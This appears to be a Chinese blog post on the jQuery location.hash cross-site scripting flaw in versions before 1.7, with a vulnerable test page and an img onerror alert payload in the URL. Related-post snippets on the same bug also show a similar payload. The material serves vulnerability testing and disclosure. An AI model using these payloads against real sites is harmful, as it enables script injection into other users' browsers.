jquery下载地址:https://code.jquery.com/jquery/ 影响范围: 版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷,可能导致LOCA

最新推荐文章于 2024-09-19 15:57:45 发布
最新推荐文章于 2024-09-19 15:57:45 发布
阅读量4.7k 收藏
点赞数

jquery下载地址:https://code.jquery.com/jquery/


影响范围:

    版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷,可能导致LOCATION.HASH跨站漏洞

已测试成功版本:

    jquery-1.6.min.js,jquery-1.6.1.min.js,jquery-1.6.2.min.js

    jquery-1.5所有版本

    jquery-1.4所有版本

    jquery-1.3所有版本

    jquery-1.2所有版本

测试:

启动nginx,并建立index.html页面,内容如下:

漏洞发现者给的测试代码:

<html>

<head>

    <title>JQuery-xss-test</title>

    <script src="https://code.jquery.com/jquery-1.6.1.min.js"></script>

    <script>

    $(function(){

    try { $(location.hash) } catch(e) {}

    })

    </script>

</head>

<body>

    Jquery xss test.

</body>

</html>

访问地址:

http://localhost/#<img src=/ οnerrοr=alert(/F4ckTeam/)>

测试截图:

技术分享



杨航 AI
关注
javascript中正则表达式实现输入内容过滤
02-26
javascript中正则表达式实现输入内容过滤
jQuery跨站脚本漏洞XSS with $(location.hash)漏洞
weixin_34090643的博客
12-01 4616
jquery下载地址https://code.jquery.com/jquery/ 影响范围版本低于1.7jQuery过滤用户输入数据使用正则表达式存在缺陷可能导致LOCATION.HASH跨站漏洞已测试成功版本jquery-1.6.min.js,jquery-1.6.1.min.js,jquery-1.6.2.min.jsjquery-...
jQuery基础知识学习
最新发布
2301_78566776的博客
09-19 380
方法描述:outerHeight(false/true),获取内容元素height+padding+border的值,如果是true再加上margin的值。方法描述:outerWidth(false/true),获取内容元素width+padding+border的值,如果是true再加上margin的值。获取匹配元素集合中的第一个元素的样式属性的计算值或设置每个匹配元素的一个或多个CSS属性。该方法主要用于获取表单元素的值和设置表单元素的值,该方法读写一体。向当前匹配的所有元素内部的最后面插入指定内容。
javascript正则表达式,jquery正则
04-03 547
一、javascript正则表达式的基本知识 1 javascript 正则对象创建 和用法声明javascript 正则表达式 var reCat = new RegExp(“cat”); 你也可以 var reCat = /cat/; //Perl 风格 (推荐) 2 学习最常用的 test exec match search replace split 6个方法
jquery中的过滤操作
weixin_34357962的博客
05-22 92
1.过滤 Filtering 名称 说明 举例 eq( index ) 获取第N个元素 获取匹配的第二个元素: $("p").eq(1) filter( expr ) 筛选出与指定表达式匹配的元素集合。 保留带有select类的元素: $("p").filter(".selected") filter( fn ) 筛选出...
JQuery跨站脚本漏洞
weixin_44110913的博客
08-01 1938
原理:     jQuery过滤用户输入数据使用正则表达式存在缺陷可能导致 location.hash 跨站漏洞 影响版本:     jquery-1.7.1~1.8.3     jquery-1.6.min.js,jquery-1.6.1.min.js,jquery-1.6.2.min.js  &...
jquery.colorpicker 下载资源
11-01
<script src="https://code.jquery.com/jquery.min.js"></script> <script src="jquery.colorpicker.js"></script> .color-picker-input { width: 100px; } </style> </head> ...
maven命令行创建web项目报错:java.lang.NoClassDefFoundError: org/apache/commons/lang/StringUtils...
wuxun1997的专栏
11-21 8878
  早上新建一个web项目,没想到一敲命令创建就失败了,真是出师不利。各种折腾无果,当然我也可以用eclipse直接创建的,就是想搞清楚状况。刚刚才发现问题原因,这个结果我也是醉了,太坑爹了。   问题现象: E:\workspace>mvn archetype:generate -DarchetypeCatalog=internal -DgroupId=com.wulf.memcac...
jQuery的三种bind/One/Live/On事件绑定使用方法
10-20
jQuery是JavaScript库中的一个核心组件,以其简洁的API和强大的功能深受开发者喜爱。在早期版本中,`bind()`是用于绑定事件的主要方法。然而,随着jQuery的发展,为了提供更高效和灵活的事件处理,出现了`one()`、`...
jQuery.removeData:扩展jQuery removeData也可以删除元素上的相应数据属性
05-03
jQuery.removeData 扩展jQuery 以添加以下功能: (可选)删除元素上的相应数据属性(如果添加时不使用.data() ) 仅当值与选项中传递的值匹配时,才删除属性 要传递允许数据属性值包含data- 当前版本: 2.0.0 ...
jquery:学习jquery源代码-jquery source code
03-24
为了构建jQuery,您需要拥有最新的Node.js / npm和git 1.7或更高版本。 较早的版本可能有效,但不受支持。 对于Windows,您必须下载并安装和 OS X用户应安装 。 安装Homebrew后,运行brew install git来安装git,...
跨站脚本漏洞(XSS)示例
04-15
NULL 博文链接:https://songjianyong.iteye.com/blog/1754973
漏洞笔记】jQuery跨站脚本
TeamsSix 的 CSDN 空间
11-20 2107
0x00 概述 漏洞名称:jQuery跨站脚本 风险等级:低危 问题类型:使用已知漏洞的组件 0x01 漏洞描述 关于jQueryjQuery是美国程序员John Resig所研发的一套开源、跨浏览器的JavaScript库。该库简化了HTML与JavaScript之间的操作,并具有模块化、插件扩展等特点。 漏洞原理:jQuery过滤用户输入数据使用正则表达式存在缺陷可能导致 locat...
jQuery跨站脚本漏洞
weixin_50464560的博客
08-21 2291
原理:     jQuery过滤用户输入数据使用正则表达式存在缺陷可能导致 location.hash 跨站漏洞 影响版本:     jquery-1.7.1~1.8.3    jquery-1.6.min.js,jquery-1.6.1.min.js,jquery-1.6.2.min...
白帽子讲web安全笔记-利用location.hash绕过长度限制_使用DVWA实现
Leonard_wang的专栏
12-21 1987
在DVWA实现利用location.hash突破针对xss攻击的长度限制
解决jquery版本过低引发的XSS跨站安全漏洞
热门推荐
kang1011的博客
11-13 1万+
解决jquery版本过低引发的安全漏洞 测试网站是否存在此XSS跨站漏洞: 以google浏览器为例,打开要测试的网站,在Console窗口输入: $.fn.jquery 回车查看版本号 $(“element[attribute=’<img src=123123 οnerrοr=alert(123)>’”); 回车之后会出现弹窗,说明存在XSS跨站漏洞 漏洞原因: 1.x系列版本等于或低于1.12的jQuery,和2.x系列版本等于或低于2.2的jQuery过滤用户输入数据使用
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值